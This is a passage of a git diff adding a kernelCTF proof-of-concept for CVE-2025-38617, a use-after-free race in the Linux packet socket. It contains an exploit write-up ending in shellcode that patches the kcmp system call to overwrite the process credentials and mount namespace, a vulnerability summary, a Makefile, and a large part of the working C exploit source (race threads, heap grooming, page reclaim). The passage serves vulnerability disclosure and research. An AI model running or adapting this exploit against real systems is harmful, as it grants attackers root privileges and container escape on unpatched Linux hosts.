pipe_buffer` object, we use `pipe_buffer->ops` pointer which contain `anon_pipe_buf_ops` address to calculate kernel base and bypass KASLR. +8. Close the pipe and retry the process in case we didn't find the data look like `struct pipe_buffer` object. + +Now, we have kernel base address. We continue to update some useful kernel address. +```c +u64 init_cred = 0x2c72ec0; +u64 init_fs = 0x2dad900; +u64 __x86_return_thunk = 0x14855d0; +u64 __do_sys_kcmp = 0x273d70; + +static inline void update_kernel_address(u64 kernel_base) +{ + init_cred += kernel_base; + init_fs += kernel_base; + __x86_return_thunk += kernel_base; + __do_sys_kcmp += kernel_base; +} +``` + +# Patch `sys_kcmp` +Use `abr_page_read_write_primitive` to patch `kcmp` system call handler with: +```c +extern void privilege_escalation_shellcode_begin(void); +extern void privilege_escalation_shellcode_end(void); + +__asm__( + ".intel_syntax noprefix;" + ".global privilege_escalation_shellcode_begin;" + ".global privilege_escalation_shellcode_end;" + + "privilege_escalation_shellcode_begin:\n" + + "mov rax,QWORD PTR gs:0x32380;" + "shl rdi, 32;" + "shl rsi, 32;" + "shr rsi, 32;" + "or rdi, rsi;" + "mov QWORD PTR [rax + 0x7c0], rdi;" + "mov QWORD PTR [rax + 0x7b8], rdi;" + "mov QWORD PTR [rax + 0x810], rcx;" + "jmp r8;" + + "privilege_escalation_shellcode_end:\n" + ".att_syntax;" +); +``` + +Every process running on Linux is represented by `struct task_struct` from kernel point of view. On the kernel that the exploit is running, these numbers represent: +- when kernel is handle system call, `gs:0x32380` contain pointer to the current process issues syscall +- 0x7c0: task_struct->cred offset +- 0x7b8: task_struct->real_cred offset +- 0x810: task_struct->fs offset + +# Privilege escalation +```c +int not_used = -1; +syscall(SYS_kcmp, (u32)(init_cred >> 32), (u32)(init_cred), not_used, init_fs, __x86_return_thunk); +``` + +This is roughly equivalent to: +```c +struct task_struct *exploit_task_struct = QWORD PTR gs:0x32380; +exploit_task_struct->cred = init_cred; +exploit_task_struct->real_cred = init_cred; +exploit_task_struct->fs = init_fs; // Instead of perform full container escape, set the mount namespace back to `init_fs` is enough to read the flag outside the container. +__x86_return_thunk; +``` diff --git a/pocs/linux/kernelctf/CVE-2025-38617_mitigation_cos/docs/vulnerability.md b/pocs/linux/kernelctf/CVE-2025-38617_mitigation_cos/docs/vulnerability.md new file mode 100644 index 000000000..f7352b68b --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2025-38617_mitigation_cos/docs/vulnerability.md @@ -0,0 +1,24 @@ +# Vulnerability + +A race between packet_set_ring() and packet_notifier() allow the packet socket to hook to network interface and receive packet sent to that network interface while the ring buffer is configured. The received packet might found the old ring buffer that already be freed. + +## Requirements to trigger the vulnerability: +- Capabilities: To trigger the vulnerability, `CAP_NET_RAW` capabilities are required. +- Kernel configuration: `CONFIG_PACKET` is required to trigger this vulnerability. +- Are user namespaces needed?: Yes. As this vulnerability requires `CAP_NET_RAW`, which are not usually given to the normal user, we used the unprivileged user namespace to achieve this capability. + +## Commit which introduced the vulnerability +- This vulnerability was introduced in Linux-2.6.12-rc2, with commit [ce06b03e60fc1](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=ce06b03e60fc1) +- This commit add head drop fifo queue to the kernel. + +## Commit which fixed the vulnerability +- This vulnerability was fixed with commit [01d3c8417b9c1b884a8a981a3b886da556512f36](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=01d3c8417b9c1b884a8a981a3b886da556512f36) + +## Affected kernel versions +- Linux version 2.6.12 - 6.16 affects to this vulnerability + +## Affected component, subsystem +- Packet socket + +## Cause (UAF, BoF, race condition, double free, refcount overflow, etc) +- UAF \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2025-38617_mitigation_cos/exploit/cos-109-17800.519.41/Makefile b/pocs/linux/kernelctf/CVE-2025-38617_mitigation_cos/exploit/cos-109-17800.519.41/Makefile new file mode 100644 index 000000000..e9e975869 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2025-38617_mitigation_cos/exploit/cos-109-17800.519.41/Makefile @@ -0,0 +1,32 @@ +# taken from: https://github.com/google/security-research/blob/1bb2f8c8d95a34cafe7861bc890cfba5d85ec141/pocs/linux/kernelctf/CVE-2024-0193_lts/exploit/lts-6.1.67/Makefile + +LIBMNL_DIR = $(realpath ./)/libmnl_build +LIBNFTNL_DIR = $(realpath ./)/libnftnl_build + +LIBS = -L$(LIBMNL_DIR)/install/lib -lmnl +INCLUDES = -I$(LIBMNL_DIR)/libmnl-1.0.5/include +CFLAGS = -static -Ofast + +exploit: exploit.c + gcc -o exploit exploit.c $(LIBS) $(INCLUDES) $(CFLAGS) + + +prerequisites: libmnl-build + +libmnl-build : libmnl-download + tar -C $(LIBMNL_DIR) -xvf $(LIBMNL_DIR)/libmnl-1.0.5.tar.bz2 + cd $(LIBMNL_DIR)/libmnl-1.0.5 && ./configure --enable-static --prefix=`realpath ../install` + cd $(LIBMNL_DIR)/libmnl-1.0.5 && make -j`nproc` + cd $(LIBMNL_DIR)/libmnl-1.0.5 && make install + + +libmnl-download : + mkdir $(LIBMNL_DIR) + wget -P $(LIBMNL_DIR) https://netfilter.org/projects/libmnl/files/libmnl-1.0.5.tar.bz2 + +run: + ./exploit + +clean: + rm -f exploit + rm -rf $(LIBMNL_DIR) diff --git a/pocs/linux/kernelctf/CVE-2025-38617_mitigation_cos/exploit/cos-109-17800.519.41/exploit b/pocs/linux/kernelctf/CVE-2025-38617_mitigation_cos/exploit/cos-109-17800.519.41/exploit new file mode 100644 index 000000000..dcc45722b Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2025-38617_mitigation_cos/exploit/cos-109-17800.519.41/exploit differ diff --git a/pocs/linux/kernelctf/CVE-2025-38617_mitigation_cos/exploit/cos-109-17800.519.41/exploit.c b/pocs/linux/kernelctf/CVE-2025-38617_mitigation_cos/exploit/cos-109-17800.519.41/exploit.c new file mode 100644 index 000000000..d08c9d8b4 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2025-38617_mitigation_cos/exploit/cos-109-17800.519.41/exploit.c @@ -0,0 +1,2142 @@ +#include "exploit.h" + +void unix_error(const char *msg) +{ + fprintf(stderr, "%s: %s\n", msg, strerror(errno)); + exit(EXIT_FAILURE); +} + +void Mnl_socket_error(const char *msg) +{ + fprintf(stderr, "%s: %s\n", msg, strerror(errno)); + exit(EXIT_FAILURE); +} + +void Pthread_error(const char *msg, int error_code) +{ + fprintf(stderr, "%s: %s\n", msg, strerror(error_code)); + exit(EXIT_FAILURE); +} + +void Unshare(int flags) +{ + if (unshare(flags) < 0) + unix_error("unshare"); +} + +int Socket(int domain, int type, int protocol) +{ + int fd = socket(domain, type, protocol); + if (fd < 0) + unix_error("socket"); + return fd; +} + +void Setsockopt(int fd, int level, int optname, const void *optval, socklen_t optlen) +{ + if (setsockopt(fd, level, optname, optval, optlen) < 0) + unix_error("setsockopt"); +} + +void Getsockopt(int fd, int level, int optname, void *optval, socklen_t *optlen) +{ + if (getsockopt(fd, level, optname, optval, optlen) < 0) + unix_error("getsockopt"); +} + +void Bind(int fd, const struct sockaddr *addr, socklen_t addrlen) +{ + if (bind(fd, addr, addrlen) < 0) + unix_error("bind"); +} + +void Ioctl(int fd, unsigned long request, unsigned long arg) +{ + if (ioctl(fd, request, arg) < 0) + unix_error("ioctl"); +} + +void Close(int fd) +{ + if (close(fd) < 0) + unix_error("close"); +} + +int Dup(int fd) +{ + int newfd = dup(fd); + if (newfd < 0) + unix_error("dup"); + return newfd; +} + +void Pipe2(int pipefd[2], int flags) +{ + if (pipe2(pipefd, flags) < 0) + unix_error("pipe2"); +} + +int Fcntl(int fd, int op, unsigned long arg) +{ + int ret = fcntl(fd, op, arg); + if (ret < 0) + unix_error("fcntl"); + return ret; +} + +void *Mmap(void *addr, size_t len, int prot, int flags, int fd, off_t offset) +{ + void *m = mmap(addr, len, prot, flags, fd, offset); + if (m == MAP_FAILED) + unix_error("mmap"); + return m; +} + +void Munmap(void *addr, size_t len) +{ + if (munmap(addr, len) < 0) + unix_error("munmap"); +} + +FILE *Fopen(const char *filename, const char *modes) +{ + FILE *f = fopen(filename, modes); + if (f == NULL) + unix_error("fopen"); + return f; +} + +void Fclose(FILE *stream) +{ + if (fclose(stream) != 0) + unix_error("fclose"); +} + +void *Calloc(size_t nmemb, size_t size) +{ + void *p = calloc(nmemb, size); + if (p == NULL) + unix_error("calloc"); + return p; +} + +ssize_t Sendmsg(int socket, const struct msghdr *message, int flags) +{ + ssize_t ret = sendmsg(socket, message, flags); + if (ret < 0) + unix_error("sendmsg"); + return ret; +} + +void Pthread_create(pthread_t *newthread, const pthread_attr_t *attr, void *(*start_routine) (void *), void *arg) +{ + int ret = pthread_create(newthread, attr, start_routine, arg); + if (ret != 0) + Pthread_error("pthread_create", ret); +} + +void Pthread_join(pthread_t thread, void **retval) +{ + int ret = pthread_join(thread, retval); + if (ret != 0) + Pthread_error("pthread_join", ret); +} + +void Pthread_setaffinity_np(pthread_t thread, size_t cpusetsize, const cpu_set_t *cpuset) +{ + int ret = pthread_setaffinity_np(thread, cpusetsize, cpuset); + if (ret != 0) + Pthread_error("pthread_setaffinity_np", ret); +} + +void Getrlimit(int resource, struct rlimit *rlim) +{ + if (getrlimit(resource, rlim) < 0) + unix_error("getrlimit"); +} + +void Setrlimit(int resource, const struct rlimit *rlim) +{ + if (setrlimit(resource, rlim) < 0) + unix_error("setrlimit"); +} + +void Setpriority(int which, id_t who, int value) +{ + if (setpriority(which, who, value) < 0) + unix_error("setpriority"); +} + +int Timerfd_create(int clockid, int flags) +{ + int timerfd = timerfd_create(clockid, flags); + if (timerfd < 0) + unix_error("timerfd_create"); + return timerfd; +} + +void Timerfd_settime(int fd, int flags, const struct itimerspec *new_value, struct itimerspec *old_value) +{ + if (timerfd_settime(fd, flags, new_value, old_value) < 0) + unix_error("timerfd_settime"); +} + +int Epoll_create1(int flags) +{ + int epfd = epoll_create1(flags); + if (epfd < 0) + unix_error("epoll_create1"); + return epfd; +} + +void Epoll_ctl(int epfd, int op, int fd, struct epoll_event *event) +{ + if (epoll_ctl(epfd, op, fd, event) < 0) + unix_error("epoll_ctl"); +} + +unsigned int If_nametoindex(const char *ifname) +{ + unsigned int ifindex = if_nametoindex(ifname); + if (ifindex == 0) + unix_error("if_nametoindex"); + return ifindex; +} + +void Mkdir(const char *pathname, mode_t mode) +{ + if (mkdir(pathname, mode) < 0) + unix_error("mkdir"); +} + +void Mount(const char *source, const char *target, const char *filesystemtype, unsigned long mountflags, const void *data) +{ + if (mount(source, target, filesystemtype, mountflags, data) < 0) + unix_error("mount"); +} + +int Open(const char *pathname, int flags, mode_t mode) +{ + int fd = open(pathname, flags, mode); + if (fd < 0) + unix_error("open"); + return fd; +} + +void Setxattr(const char *path, const char *name, const void *value, size_t size, int flags) +{ + if (setxattr(path, name, value, size, flags) < 0) + unix_error("setxattr"); +} + +ssize_t Getxattr(const char *path, const char *name, void *value, size_t size) +{ + ssize_t ret = getxattr(path, name, value, size); + if (ret < 0) + unix_error("getxattr"); + return ret; +} + +void Removexattr(const char *path, const char *name) +{ + if (removexattr(path, name) < 0) + unix_error("removexattr"); +} + +char *Strdup(const char *s) +{ + char *s1 = strdup(s); + if (s1 == NULL) + unix_error("strdup"); + return s1; +} + +ssize_t Read(int fd, void *buf, size_t count) +{ + ssize_t ret = read(fd, buf, count); + if (ret < 0) + unix_error("read"); + return ret; +} + +ssize_t Write(int fd, const void *buf, size_t count) +{ + ssize_t ret = write(fd, buf, count); + if (ret < 0) + unix_error("write"); + return ret; +} + +struct mnl_socket *Mnl_socket_open(int bus) +{ + struct mnl_socket *nl = mnl_socket_open(bus); + if (nl == NULL) + Mnl_socket_error("mnl_socket_open"); + return nl; +} + +void Mnl_socket_close(struct mnl_socket *nl) +{ + if (mnl_socket_close(nl) < 0) + Mnl_socket_error("mnl_socket_close"); +} + +void Mnl_socket_bind(struct mnl_socket *nl, unsigned int groups, pid_t pid) +{ + if (mnl_socket_bind(nl, groups, pid) < 0) + Mnl_socket_error("mnl_socket_bind"); +} + +ssize_t Mnl_socket_sendto(const struct mnl_socket *nl, const void *req, size_t size) +{ + ssize_t rc = mnl_socket_sendto(nl, req, size); + if (rc < 0) + Mnl_socket_error("mnl_socket_sendto"); + return rc; +} + +ssize_t Mnl_socket_recvfrom(const struct mnl_socket *nl, void *buf, size_t size) +{ + ssize_t rc = mnl_socket_recvfrom(nl, buf, size); + if (rc < 0) + Mnl_socket_error("mnl_socket_recvfrom"); + return rc; +} + +void validate_mnl_socket_operation_success(struct mnl_socket *nl, u32 seq) +{ + u8 buf[8192] = {}; + u32 portid = mnl_socket_get_portid(nl); + ssize_t ret = mnl_socket_recvfrom(nl, buf, sizeof(buf)); + + while (ret > 0) { + ret = mnl_cb_run(buf, ret, seq, portid, NULL, NULL); + if (ret <= 0) + break; + ret = mnl_socket_recvfrom(nl, buf, sizeof(buf)); + } + + if (ret < 0) + exit(EXIT_FAILURE); +} + +void dummy_network_interface_create(const char *ifname, u32 mtu) +{ + struct mnl_socket *nl = Mnl_socket_open(NETLINK_ROUTE); + Mnl_socket_bind(nl, 0, MNL_SOCKET_AUTOPID); + u32 seq = time(NULL); + u8 buf[8192] = {}; + + struct nlmsghdr *nlh = mnl_nlmsg_put_header(buf); + nlh->nlmsg_type = RTM_NEWLINK; + nlh->nlmsg_seq = seq; + nlh->nlmsg_flags = NLM_F_ACK | NLM_F_REQUEST | NLM_F_CREATE; + + struct ifinfomsg *ifm = mnl_nlmsg_put_extra_header(nlh, sizeof(*ifm)); + mnl_attr_put_strz(nlh, IFLA_IFNAME, ifname); + mnl_attr_put_u32(nlh, IFLA_MTU, mtu); + + struct nlattr *linkinfo = mnl_attr_nest_start(nlh, IFLA_LINKINFO); + mnl_attr_put_strz(nlh, IFLA_INFO_KIND, "dummy"); + mnl_attr_nest_end(nlh, linkinfo); + + Mnl_socket_sendto(nl, nlh, nlh->nlmsg_len); + validate_mnl_socket_operation_success(nl, seq); + Mnl_socket_close(nl); +} + +void network_interface_up(int configure_socket_fd, const char *ifname) +{ + struct ifreq ifr = {}; + strncpy(ifr.ifr_name, ifname, IFNAMSIZ); + Ioctl(configure_socket_fd, SIOCGIFFLAGS, (unsigned long)&ifr); + + strncpy(ifr.ifr_name, ifname, IFNAMSIZ); + ifr.ifr_flags |= (IFF_UP | IFF_RUNNING); + Ioctl(configure_socket_fd, SIOCSIFFLAGS, (unsigned long)&ifr); +} + +void network_interface_down(int configure_socket_fd, const char *ifname) +{ + struct ifreq ifr = {}; + strncpy(ifr.ifr_name, ifname, IFNAMSIZ); + Ioctl(configure_socket_fd, SIOCGIFFLAGS, (unsigned long)&ifr); + + strncpy(ifr.ifr_name, ifname, IFNAMSIZ); + ifr.ifr_flags &= (~IFF_UP); + Ioctl(configure_socket_fd, SIOCSIFFLAGS, (unsigned long)&ifr); +} + +void pin_thread_on_cpu(int cpu) +{ + cpu_set_t cpuset; + CPU_ZERO(&cpuset); + CPU_SET(cpu, &cpuset); + + pthread_t current_thread = pthread_self(); + Pthread_setaffinity_np(current_thread, sizeof(cpu_set_t), &cpuset); +} + +void setup_namespace(void) +{ + int uid = getuid(); + int gid = getgid(); + + Unshare(CLONE_NEWUSER | CLONE_NEWNET | CLONE_NEWNS); + + FILE *f = NULL; + f = Fopen("/proc/self/uid_map", "w"); + fprintf(f, "0 %d 1\n", uid); + Fclose(f); + + f = Fopen("/proc/self/setgroups", "w"); + fprintf(f, "deny\n"); + Fclose(f); + + f = Fopen("/proc/self/gid_map", "w"); + fprintf(f, "0 %d 1\n", gid); + Fclose(f); +} + +void setup_tmpfs(void) +{ + Mkdir(TMPFS_MOUNT_POINT, 0644); + Mount("none", TMPFS_MOUNT_POINT, "tmpfs", 0, NULL); + create_file(PAGES_ORDER2_GROOM_SIMPLE_XATTR_FILEPATH); +} + +void setup_nofile_rlimit(void) +{ + struct rlimit nofile_rlimit = {}; + Getrlimit(RLIMIT_NOFILE, &nofile_rlimit); + nofile_rlimit.rlim_cur = nofile_rlimit.rlim_max; + Setrlimit(RLIMIT_NOFILE, &nofile_rlimit); +} + +void create_file(const char *path) +{ + int fd = Open(path, O_WRONLY | O_CREAT, 0644); + Close(fd); +} + +bool thread_in_sleep_state(int tid) +{ + if (tid == -1) + return false; + + char proc_path[4096] = {}; + char line_buffer[4096] = {}; + + snprintf(proc_path, sizeof(proc_path), "/proc/%d/stat", tid); + FILE *f = Fopen(proc_path, "r"); + + if (!fgets(line_buffer, sizeof(line_buffer), f)) { + Fclose(f); + return false; + } + + char *p = line_buffer; + int space_count = 0; + while (*p != '\0' && space_count != 2) { + if (*p == ' ') { + space_count++; + } + + p++; + } + + Fclose(f); + + if (*p == 'S' || *p == 'D') { + return true; + } + + return false; +} + +void alloc_pages(int packet_socket, unsigned page_count, unsigned page_size) +{ + struct tpacket_req tx_ring_req = {}; + tx_ring_req.tp_block_nr = page_count; + tx_ring_req.tp_block_size = page_size; + tx_ring_req.tp_frame_size = page_size; + tx_ring_req.tp_frame_nr = tx_ring_req.tp_block_size / tx_ring_req.tp_frame_size * tx_ring_req.tp_block_nr; + Setsockopt(packet_socket, SOL_PACKET, PACKET_TX_RING, &tx_ring_req, sizeof(tx_ring_req)); +} + +void free_pages(int packet_socket) +{ + struct tpacket_req tx_ring_req = {}; + Setsockopt(packet_socket, SOL_PACKET, PACKET_TX_RING, &tx_ring_req, sizeof(tx_ring_req)); +} + +struct victim_packet_socket_config *victim_packet_socket_config_create( + struct __kernel_sock_timeval sndtimeo, + struct sockaddr_ll addr, + struct tpacket_req3 tx_ring, + struct tpacket_req3 rx_ring, + int packet_loss, + int packet_version, + unsigned packet_reserve, + struct sock_filter filter[MAX_FILTER_LEN] +) +{ + struct victim_packet_socket_config *config = Calloc(1, sizeof(*config)); + config->sndtimeo = sndtimeo; + config->addr = addr; + config->tx_ring = tx_ring; + config->rx_ring = rx_ring; + config->packet_loss = packet_loss; + config->packet_version = packet_version; + config->packet_reserve = packet_reserve; + memcpy(config->filter, filter, MAX_FILTER_LEN * sizeof(struct sock_filter)); + return config; +} + +void victim_packet_socket_config_destroy(struct victim_packet_socket_config *config) +{ + free(config); +} + +struct victim_packet_socket *victim_packet_socket_create(struct victim_packet_socket_config *config) +{ + struct victim_packet_socket *v = Calloc(1, sizeof(*v)); + v->config = Calloc(1, sizeof(*v->config)); + memcpy(v->config, config, sizeof(struct victim_packet_socket_config)); + v->fd = Socket(AF_PACKET, SOCK_RAW, 0); + return v; +} + +void victim_packet_socket_destroy(struct victim_packet_socket *v) +{ + victim_packet_socket_config_destroy(v->config); + Close(v->fd); + free(v); +} + +void victim_packet_socket_configure(struct victim_packet_socket *v) +{ + struct victim_packet_socket_config *config = v->config; + Bind(v->fd, (const struct sockaddr *)&config->addr, sizeof(config->addr)); + Setsockopt(v->fd, SOL_SOCKET, SO_SNDTIMEO_NEW, &config->sndtimeo, sizeof(config->sndtimeo)); + Setsockopt(v->fd, SOL_PACKET, PACKET_LOSS, &config->packet_loss, sizeof(config->packet_loss)); + Setsockopt(v->fd, SOL_PACKET, PACKET_VERSION, &config->packet_version, sizeof(config->packet_version)); + Setsockopt(v->fd, SOL_PACKET, PACKET_RESERVE, &config->packet_reserve, sizeof(config->packet_reserve)); + Setsockopt(v->fd, SOL_PACKET, PACKET_RX_RING, &config->rx_ring, sizeof(config->rx_ring)); + Setsockopt(v->fd, SOL_PACKET, PACKET_TX_RING, &config->tx_ring, sizeof(config->tx_ring)); + struct sock_fprog fprog = { .filter = config->filter, .len = MAX_FILTER_LEN }; + Setsockopt(v->fd, SOL_SOCKET, SO_ATTACH_FILTER, &fprog, sizeof(fprog)); + + u64 tx_ring_size = (u64)config->tx_ring.tp_block_size * config->tx_ring.tp_block_nr; + u64 rx_ring_size = (u64)config->rx_ring.tp_block_size * config->rx_ring.tp_block_nr; + u64 ring_size = tx_ring_size + rx_ring_size; + void *ring = Mmap(NULL, ring_size, PROT_READ | PROT_WRITE, MAP_SHARED, v->fd, 0); + void *tx_ring = ring + rx_ring_size; + struct tpacket3_hdr *h = tx_ring; + h->tp_len = 1; + h->tp_status = TP_STATUS_SEND_REQUEST; + Munmap(ring, ring_size); +} + +struct simple_xattr_request *simple_xattr_request_create( + const char *filepath, + const char *name, + const char *value, + size_t value_size +) +{ + struct simple_xattr_request *request = Calloc(1, sizeof(*request)); + strncpy(request->filepath, filepath, PATH_MAX); + strncpy(request->name, name, XATTR_NAME_MAX); + request->value = Calloc(1, value_size); + memcpy(request->value, value, value_size); + request->value_size = value_size; + request->allocated = false; + return request; +} + +void simple_xattr_request_destroy(struct simple_xattr_request *request) +{ + free(request->value); + free(request); +} + +void *timerfd_waitlist_thread_fn(void *arg) +{ + pin_thread_on_cpu(CPU_NUMBER_ONE); + struct timerfd_waitlist_thread *t = arg; + t->tid = gettid(); + + Unshare(CLONE_FILES); + pthread_mutex_lock(&t->mutex); + t->unshare_complete = true; + pthread_cond_signal(&t->cond); + pthread_mutex_unlock(&t->mutex); + + Close(STDIN_FILENO); + Close(STDOUT_FILENO); + + int epollfd = Epoll_create1(0); + + struct rlimit nofile_rlimit = {}; + Getrlimit(RLIMIT_NOFILE, &nofile_rlimit); + t->timerfds = Calloc(nofile_rlimit.rlim_cur, sizeof(*t->timerfds)); + t->timerfds[0] = t->timerfd; + t->total_timerfd = 1; + + for (int i = 1; i < (int)nofile_rlimit.rlim_cur; i++) { + t->timerfds[i] = dup(t->timerfds[0]); + if (t->timerfds[i] < 0) + break; + + t->total_timerfd++; + } + + t->epoll_events = Calloc(t->total_timerfd, sizeof(*t->epoll_events)); + for (int i = 0; i < t->total_timerfd; i++) { + t->epoll_events[i].data.fd = t->timerfds[i]; + t->epoll_events[i].events = EPOLLIN; + Epoll_ctl(epollfd, EPOLL_CTL_ADD, t->timerfds[i], &t->epoll_events[i]); + } + + for ( ;; ) { + pthread_mutex_lock(&t->mutex); + while (!t->quit && !t->ready_to_work) + pthread_cond_wait(&t->cond, &t->mutex); + + t->ready_to_work = false; + bool quit = t->quit; + pthread_mutex_unlock(&t->mutex); + + if (quit) + break; + + pthread_mutex_lock(&t->mutex); + t->work_complete = true; + pthread_cond_signal(&t->cond); + pthread_mutex_unlock(&t->mutex); + } + + for (int i = 1; i < t->total_timerfd; i++) + Close(t->timerfds[i]); + + Close(epollfd); + free(t->epoll_events); + free(t->timerfds); + + return NULL; +} + +void timerfd_waitlist_thread_wait_unshare_complete(struct timerfd_waitlist_thread *t) +{ + pthread_mutex_lock(&t->mutex); + while (!t->unshare_complete) + pthread_cond_wait(&t->cond, &t->mutex); + pthread_mutex_unlock(&t->mutex); +} + +void timerfd_waitlist_thread_send_work(struct timerfd_waitlist_thread *t) +{ + pthread_mutex_lock(&t->mutex); + t->ready_to_work = true; + pthread_cond_signal(&t->cond); + pthread_mutex_unlock(&t->mutex); +} + +void timerfd_waitlist_thread_wait_in_work(struct timerfd_waitlist_thread *t) +{ + while (t->tid == -1) { + ; + } + + while (!thread_in_sleep_state(t->tid)) { + ; + } +} + +void timerfd_waitlist_thread_wait_work_complete(struct timerfd_waitlist_thread *t) +{ + pthread_mutex_lock(&t->mutex); + while (!t->work_complete) + pthread_cond_wait(&t->cond, &t->mutex); + t->work_complete = false; + pthread_mutex_unlock(&t->mutex); +} + +void timerfd_waitlist_thread_quit(struct timerfd_waitlist_thread *t) +{ + pthread_mutex_lock(&t->mutex); + t->quit = true; + pthread_cond_signal(&t->cond); + pthread_mutex_unlock(&t->mutex); + Pthread_join(t->handle, NULL); +} + +struct timerfd_waitlist_thread *timerfd_waitlist_thread_create(int timerfd) +{ + struct timerfd_waitlist_thread *t = Calloc(1, sizeof(*t)); + t->tid = -1; + t->timerfd = timerfd; + pthread_mutex_init(&t->mutex, NULL); + pthread_cond_init(&t->cond, NULL); + Pthread_create(&t->handle, NULL, timerfd_waitlist_thread_fn, t); + return t; +} + +void timerfd_waitlist_thread_destroy(struct timerfd_waitlist_thread *t) +{ + timerfd_waitlist_thread_quit(t); + pthread_cond_destroy(&t->cond); + pthread_mutex_destroy(&t->mutex); + free(t); +} + +struct pg_vec_lock_thread_work *pg_vec_lock_thread_work_create(struct victim_packet_socket *v, int ifindex) +{ + struct pg_vec_lock_thread_work *w = Calloc(1, sizeof(*w)); + w->victim_packet_socket = v; + w->ifindex = ifindex; + return w; +} + +void pg_vec_lock_thread_work_destroy(struct pg_vec_lock_thread_work *w) +{ + free(w); +} + +void *pg_vec_lock_thread_fn(void *arg) +{ + pin_thread_on_cpu(CPU_NUMBER_ZERO); + struct pg_vec_lock_thread *t = arg; + t->tid = gettid(); + + Setpriority(PRIO_PROCESS, 0, MAX_NICE); + + for ( ;; ) { + pthread_mutex_lock(&t->mutex); + while (!t->quit && !t->ready_to_work) + pthread_cond_wait(&t->cond, &t->mutex); + + struct pg_vec_lock_thread_work *work = t->work; + t->work = NULL; + t->ready_to_work = false; + bool quit = t->quit; + pthread_mutex_unlock(&t->mutex); + + if (quit) + break; + + struct sockaddr_ll addr = { .sll_ifindex = work->ifindex }; + struct msghdr msg = { .msg_name = &addr, .msg_namelen = sizeof(addr) }; + syscall(SYS_sendmsg, work->victim_packet_socket->fd, &msg, 0); + + pg_vec_lock_thread_work_destroy(work); + pthread_mutex_lock(&t->mutex); + t->work_complete = true; + pthread_cond_signal(&t->cond); + pthread_mutex_unlock(&t->mutex); + } + + return NULL; +} + +void pg_vec_lock_thread_send_work(struct pg_vec_lock_thread *t, struct pg_vec_lock_thread_work *w) +{ + pthread_mutex_lock(&t->mutex); + t->work = w; + t->ready_to_work = true; + pthread_cond_signal(&t->cond); + pthread_mutex_unlock(&t->mutex); +} + +struct timespec pg_vec_lock_thread_wait_in_work(struct pg_vec_lock_thread *t) +{ + while (!thread_in_sleep_state(t->tid)) { + ; + } + + struct timespec pg_vec_lock_acquire_time = {}; + syscall(SYS_clock_gettime, CLOCK_MONOTONIC, &pg_vec_lock_acquire_time); + return pg_vec_lock_acquire_time; +} + +void pg_vec_lock_thread_wait_work_complete(struct pg_vec_lock_thread *t) +{ + pthread_mutex_lock(&t->mutex); + while (!t->work_complete) + pthread_cond_wait(&t->cond, &t->mutex); + t->work_complete = false; + pthread_mutex_unlock(&t->mutex); +} + +void pg_vec_lock_thread_quit(struct pg_vec_lock_thread *t) +{ + pthread_mutex_lock(&t->mutex); + t->quit = true; + pthread_cond_signal(&t->cond); + pthread_mutex_unlock(&t->mutex); + Pthread_join(t->handle, NULL); +} + +struct pg_vec_lock_thread *pg_vec_lock_thread_create(void) +{ + struct pg_vec_lock_thread *t = Calloc(1, sizeof(*t)); + pthread_mutex_init(&t->mutex, NULL); + pthread_cond_init(&t->cond, NULL); + t->tid = -1; + t->packet_socket = -1; + t->ifindex = -1; + Pthread_create(&t->handle, NULL, pg_vec_lock_thread_fn, t); + return t; +} + +void pg_vec_lock_thread_destroy(struct pg_vec_lock_thread *t) +{ + pg_vec_lock_thread_quit(t); + free(t); +} + +struct pg_vec_buffer_thread_work *pg_vec_buffer_thread_work_create( + struct victim_packet_socket *v, + bool exploit, + bool cleanup +) +{ + struct pg_vec_buffer_thread_work *w = Calloc(1, sizeof(*w)); + w->victim_packet_socket = v; + w->exploit = exploit; + w->cleanup = cleanup; + return w; +} + +void pg_vec_buffer_thread_work_destroy(struct pg_vec_buffer_thread_work *w) +{ + free(w); +} + +void *pg_vec_buffer_thread_fn(void *arg) +{ + pin_thread_on_cpu(CPU_NUMBER_ZERO); + struct pg_vec_buffer_thread *t = arg; + t->tid = gettid(); + + int reclaim_pg_vec_packet_socket = Socket(AF_PACKET, SOCK_RAW, 0); + + for ( ;; ) { + pthread_mutex_lock(&t->mutex); + while (!t->quit && !t->ready_to_work) + pthread_cond_wait(&t->cond, &t->mutex); + + struct pg_vec_buffer_thread_work *work = t->work; + t->work = NULL; + t->ready_to_work = false; + bool quit = t->quit; + pthread_mutex_unlock(&t->mutex); + + if (quit) + break; + + if (work->exploit) { + struct tpacket_req3 free_pg_vec_req = {}; + syscall( + SYS_setsockopt, + work->victim_packet_socket->fd, + SOL_PACKET, + PACKET_RX_RING, + &free_pg_vec_req, + sizeof(free_pg_vec_req) + ); + + alloc_pages(reclaim_pg_vec_packet_socket, MIN_PAGE_COUNT_TO_ALLOCATE_PGV_ON_KMALLOC_16, PAGES_ORDER2_SIZE); + } + + if (work->cleanup) { + free_pages(reclaim_pg_vec_packet_socket); + } + + pg_vec_buffer_thread_work_destroy(work); + + pthread_mutex_lock(&t->mutex); + t->work_complete = true; + pthread_cond_signal(&t->cond); + pthread_mutex_unlock(&t->mutex); + } + + Close(reclaim_pg_vec_packet_socket); + return NULL; +} + +void pg_vec_buffer_thread_send_work(struct pg_vec_buffer_thread *t, struct pg_vec_buffer_thread_work *w) +{ + pthread_mutex_lock(&t->mutex); + t->work = w; + t->ready_to_work = true; + pthread_cond_signal(&t->cond); + pthread_mutex_unlock(&t->mutex); +} + +void pg_vec_buffer_thread_wait_in_work(struct pg_vec_buffer_thread *t) +{ + while (t->tid == -1) { + ; + } + + while (!thread_in_sleep_state(t->tid)) { + ; + } +} + +void pg_vec_buffer_thread_wait_work_complete(struct pg_vec_buffer_thread *t) +{ + pthread_mutex_lock(&t->mutex); + while (!t->work_complete) + pthread_cond_wait(&t->cond, &t->mutex); + t->work_complete = false; + pthread_mutex_unlock(&t->mutex); +} + +void pg_vec_buffer_thread_quit(struct pg_vec_buffer_thread *t) +{ + pthread_mutex_lock(&t->mutex); + t->quit = true; + pthread_cond_signal(&t->cond); + pthread_mutex_unlock(&t->mutex); + Pthread_join(t->handle, NULL); +} + +struct pg_vec_buffer_thread *pg_vec_buffer_thread_create(void) +{ + struct pg_vec_buffer_thread *t = 